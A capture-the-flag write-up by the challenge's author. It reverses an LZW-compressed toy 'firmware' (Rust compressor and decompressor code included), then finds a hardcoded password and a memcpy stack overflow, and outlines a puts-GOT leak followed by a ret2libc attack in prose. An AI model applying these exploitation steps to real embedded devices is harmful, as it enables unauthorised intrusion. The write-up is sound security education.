Problem

Our coworker just bought an IOT coffee machine that lets him start the brewing process from his computer. Hacking it and messing with his coffee seems like a fun prank. We were able to extract the compressed firmware and the encoder/compressor. Can you retrieve the original firmware and write an exploit for it? I'm sure it's vulnerable. It probably doesn't even have stack protectors or pie. According to the manufacturers website the md5sum of the original firmware is: 4f3b072e43086f1253f90f7fc366cfb2

challenge_files

Solution

This is one of the challenges I authored for UMassCTF 2022. I recently worked on some security research pertaining to embedded devices so I figured it'd be fun to attempt to replicate some of these aspects in a ctf challenge.

We are given 2 files, an unrecognizable binary blob named 'chal_compressed', that according to the challenge description most likely represents the compressed firmware, and an elf binary called compressor. This was most likely used to compress the firmware.

Binwalk unfortunately does not help us recognize anything within this binary blob, we can however use it to display the entropy graph shown below. The even low entropy distribution confirms that we are dealing with compression. We could try analyzing the compressed data a bit more and eg. attempt to find some strings in it that were skipped during compression, but at this point, it is probably more valuable to instead focus on the given compression binary.



The first "challenge" here is that the compressing algorithm is implemented in rust, which can often be a lot more challenging to reverse engineer than c. With some light initial reverse engineering we can figure out that the binary has 2 custom functions alongside all of the extra procedures added by the compiler. We only care about these 2 functions, main & compress.

The main function is fairly straightforward, it calls std::fs::read('./chal') to read in the binary before passing the buffer to the compress() function. This function returns the compressed data. This data is then passed to slice::raw::from_raw_parts() which in this case just transforms the 32-bit array returned from compression() to an 8-bit array before it is written out to the './chal_compressed' file.

Based off of this initial analysis, it seems like the main() function is just a small wrapper in charge of reading/writing the data to disk while the compress() function handles the actual compression logic.

The actual rust code for the main function from the challenge is posted below.

fn main() {
    let target = std::fs::read("./chal").unwrap();

    let compressed = compress(&target);
    // We can only write Vec<u8> to files using std::fs::write, so we need to convert
    // the Vec<u32> to an 8-bit array first. This handles it in a safe manner.
    let compressed_u8: &[u8] = unsafe {
        slice::from_raw_parts(
            compressed.as_ptr() as *const u8,
            compressed.len() * mem::size_of::<u32>(),
        )
    };
    std::fs::write("./chal_compressed", compressed_u8).unwrap();
}



Before diving into the code for the compress() function, let's talk a little about compression algorithms in general. The purpose of compression algorithms is to reduce the size of data. In some cases (eg. images/videos), this compression algorithm can be lossy, in which case some data is lost upon decompression. In the case of executable data however, every single opcode has to be correct upon decompression so we need a lossless algorithm.

Since the challenge hints that the underlying data is a firmware image, we can work under the assumption that we are dealing with a lossless compression algorithm. There are several different common lossless compression approaches. Some more naive implementations such as RLE compression just iterate through data and replace sequences of similar characters with n*c in the compressed data where n represents the repeated count and c the character itself. This means that 'ABBBBBBBBBCDEEEEF' would result in 'A*8BCD*4EF'. The advantages are that this compression algorithm is very simple to implement, but it only works well with files that contain a lot of repetitive data.

Other compression algorithms attempt to first analyze the entire data in an initial pass to generate a tree that maps frequently found symbols to shorter encoded counterparts. On a second pass, they then replace parts of the data with some of these symbols thus compressing the data. This technique is used in the Huffman compression algorithm. Some of its pitfalls are that it requires 2 passes over the data which makes it slightly inefficient and that this generated tree is required to decompress the data again, which makes the algorithm impractical for many use cases.

With these 2 relatively simple algorithms out of the way, we now get to LZ-compression algorithms which are most relevant to the compression algorithm found in this challenge. LZ compression algorithms started in 1977 with LZ77, and over the years many different iterations of them were developed. Many of them have since vanished from common use, but some variants such as DEFLATE which combines LZ77 & Huffman compression are still widely in use. Deflate in specific is used for zip/gzip archives, png images, and many more common file formats you have probably heard of. While LZ algorithms aren't known for their optimal compression, they still offer relatively good compression while offering extremely high performance both for compressions and decompressions which is very important for many applications.

Image Source: https://ethw.org/History_of_Lossless_Data_Compression_Algorithms



For this challenge specifically, we will focus on LZW-compression. LZW-compression is still commonly used in GIFs but has otherwise mostly been replaced by more modern algorithms. It is still a very interesting algorithm to explore because it was the base for many more modern algorithms that we frequently see today. LZW is another dictionary-based compression algorithm similar to Huffman encoding, just that it iteratively generates its dictionary while iterating through the code while immediately making the replacements. This means that it only needs a single pass over the data. Another advantage is that the dictionary is built up in a way that the decompression algorithm only needs the data to decompress so the encoding map can be discarded after compression and does not need to be passed on to the decompression routine.

LZW replaces sequences of characters with single codes without doing any initial analysis on the code. This means that it often starts out inefficient on the first few hundred bytes of data, but gets better and better as it expands the dictionary with longer repeated sequences. Typically every byte is stored using 8 bits allowing up to 256 unique symbols used to represent a single unit of data. LZW attempts to extend this mapping to more bits to allow more than 256 unique symbols to be stored at a time. Typically 9-12 are used depending on the size and structure of the data, but for the purposes of this challenge, I used 32 bits, which while laughably bad slightly reduces the complexity of the code while still maintaining the same principles, which I believe is good for a ctf challenge.

The first 256 codes are reserved for bytes 0x00-0xff so the table does not waste a lot of startup time populating it with single bytes. While iterating through the data, whenever a new sequence of bytes is encountered, an entry is added to the dictionary. Whenever this sequence of bytes is found again in the future it is just replaced with this entry instead, which while inefficient for single 1-byte characters (since they are now stored in more than 8 bits), greatly reduces the size while dealing with repeated longer data-sequences.

The below example showcases how this might look given a small sample dictionary and input.



Ok, now that we have covered the basics of various compression algorithms, let's take another look at the challenge. We start by allocating a hashmap that is used as a dictionary to keep track of the codes and initialize the first 256 entries with 0x00-0xff. Next, we start looping through the given data. We add the byte to the symbol we are currently keeping track of and check if it already exists in our codebook. If so, we just keep track of the current progress and move on to the next character to attempt to find a longer matching symbol. Once the current byte deviates from our codebook entries we add the entry we have found so far to the compressed data and insert the new entry that we just created into the dictionary we are maintaining. Then we reset the current tracker and repeat this process for the next symbol of the data. This means that if we encounter this same symbol again in the future it will now exist in the codebook so we can compress it. Like this we gradually build up a dictionary that keeps track of symbols commonly present in the compressed data, thus improving the compression as we go along.

While this method is certainly not as optimal as other compression methods that make use of heavy statistical analysis to achieve better compression results, it is extremely fast and can be implemented in very small amounts of code making it useful for low resource devices or applications that greatly benefit from a fast algorithm.

The actual code of the compression function is listed below. During the actual challenge you would have had to reverse engineer this from the binary.

fn compress(data: &[u8]) -> Vec<u32> {
    // Initialize a codebook that maps a byte sequence to a short index that can be used to to 
    // replace the bytesequence and thus compress the code. This is initialized with single 
    // character strings at the beginning.
    let mut code_book: FxHashMap<Vec<u8>, u32> = FxHashMap::default();
    for i in 0..=255 {
        code_book.insert(vec![i], i as u32);
    }

    let mut tracker = vec![data[0]];
    let mut compressed = Vec::new();

    for &b in &data[1..] {
        let mut cur = tracker.clone();
        cur.push(b);

        // Check if the code book contains tracker + the current byte, if so, extend extend the 
        // tracker with the current byte and keep increasing the combination
        if code_book.contains_key(&cur) {
            tracker.push(b);
        } else {
            // In this case we found a new entry that we can now add to the compressed data
            compressed.push(code_book[&tracker]);

            // Since this is a new entry, we insert this entry into the code book before resetting
            // the tracker
            code_book.insert(cur, code_book.len() as u32);
            tracker.clear();
            tracker.push(b);
        }
    }

    // If the final entry in the file was in the dictionary, we still need to push it to the 
    // compressed data at this point
    if !tracker.is_empty() {
        compressed.push(code_book[&tracker]);
    }

    compressed
}



With the compression out of the way, let's take a look at how the decompression works. Once again we start by allocating a hashmap and filling it up with the initial 0x00-0xff codes. This time the hashmap maps code->symbol, unlike the compression function which mapped symbol->code. Then we start iterating through the compressed data which at this point due to the previous LZW-compression consists entirely of codes. If the code we are currently on exists in the dictionary we just add the dictionary entry to the decompressed data. Since the decompression is always one step behind the compression, there is also the case where the code we are looking for does not yet exist in the dictionary. This is not a big deal though since we are only one step behind, which means that the decompression can correctly determine what the encoding process will add next and keep advancing.

While slightly more complicated than the compression itself, it is still a relatively simple algorithm overall that results in very fast decompression that even the smallest processors can handle for moderately sized data.

My sample solution for the decompression algorithm is listed below, although there are many different ways this could have been implemented.

fn decompress(data: &[u32]) -> Option<Vec<u8>> {
    // Initialize a codebook that maps an index to its corresponding byte sequence. This is used to
    // gradually build up a decoder while parsing the message and obtaining additional information. 
    // It is initialized with single character strings at the beginning.
    let mut code_book: FxHashMap<u32, Vec<u8>> = FxHashMap::default();
    for i in 0..=255 {
        code_book.insert(i, vec![i as u8]);
    }

    let mut tracker = code_book.get_mut(&data[0])?.to_vec();
    let mut decompressed = tracker.clone();

    for &b in &data[1..] {
        let entry = if code_book.contains_key(&b) {
            code_book[&b].clone()
        } else if b == code_book.len() as u32 {
            let mut e = tracker.clone();
            e.push(tracker[0]);
            e
        } else {
            return None;
        };

        decompressed.extend_from_slice(&entry);

        tracker.push(entry[0]);
        code_book.insert(code_book.len() as u32, tracker);

        tracker = entry;
    }
    Some(decompressed)
}



At this point, you should be able to extract the actual "firmware" and begin the actual exploitation process. Initially, this challenge started by spinning up a small server to communicate over sockets to better adhere to this challenges' idea. This unfortunately caused issues with hosting the challenge so I ended up instead just reading/writing to stdin.

Let's start by looking at the main function. The binary was not stripped so function names remain, making our reverse engineering process a little easier. The main function appears to read in 2 packets. It performs a check on both the first and second packet before performing some action based on the action variable that is most likely set by one of the packets.



Next, we can look at the verify_initial_packet() function that takes care of verifying the validity of the first packet. With some light reverse engineering, we can determine the structure this packet expects and define it in binja.

At this point this part of the challenge becomes almost trivial. It verifies some magic bytes, sets the 'Action' variable based on the packet and then verifies that the base64 decoded version of the given key is equal to the hardcoded password "password".



We can now do the same for the checksum verification on packet_2. We once again define a structure based on the packet layout (I have taken the liberty to fill out some fields that we do not know yet, but will become obvious with future reverse engineering). This function loops through the data part of the given packet according to the provided length and sums it up. This value is then checked against the provided checksum.

There is an out of bounds bug here since the provided length is trusted without any checking, however it is not exploitable in this case and would just lead to a crash.



Looking back at the main functions, all actions except '2' lead to exit paths, so let's focus on the path that is taken when action is set to 2, and look at the make_coffee() function.

The function itself is pretty long, however there are only a couple of interesting parts here. At the very beginning, it checks that the temperature has a sensible value. If so it proceeds to set a string that appears to list your chosen cup-size. After a memcpy() using the provided data/length, another if statement is used to determine the type of coffee requested before printing out the completed message to the user.

At this point we have all the required information to start interactiong with the binary. We can send it some valid packets and start interacting with the coffee machine.



Earlier I briefly mentioned the memcpy(). This function appears to be operating on our data and performing a memcpy() to a stack location based on the provided length. This looks like a buffer overflow. The challenge description hints that this challenge has neither pie nor stack protectors enabled, resulting in a relatively straightforward solution using return-oriented programming.

We start by sending an initial payload that calls puts_plt() using puts_got as an argument to bypass ASLR before returning to main. Next, we retrigger the same bugs to cause another overflow, this time with Libc gadgets at our disposal to simply execute a ret2libc attack.

If you are interested in the specifics of this attack, check out one of my previous writeups here: https://seal9055.com/ctf-writeups/cyber_apocalypse/controller

While this "firmware" image seemed almost too easy to break, this is the unfortunate reality of embedded security. Obvious mistakes such as printf() format string vulnerabilities or strcpy() buffer overflows occur much more frequently than you would think. A recent CVE I got for example, was due to a printf() format string bug in a popular embedded camera from a US-based company. I will be releasing a writeup on that soon too once the company has finished fixing the bugs.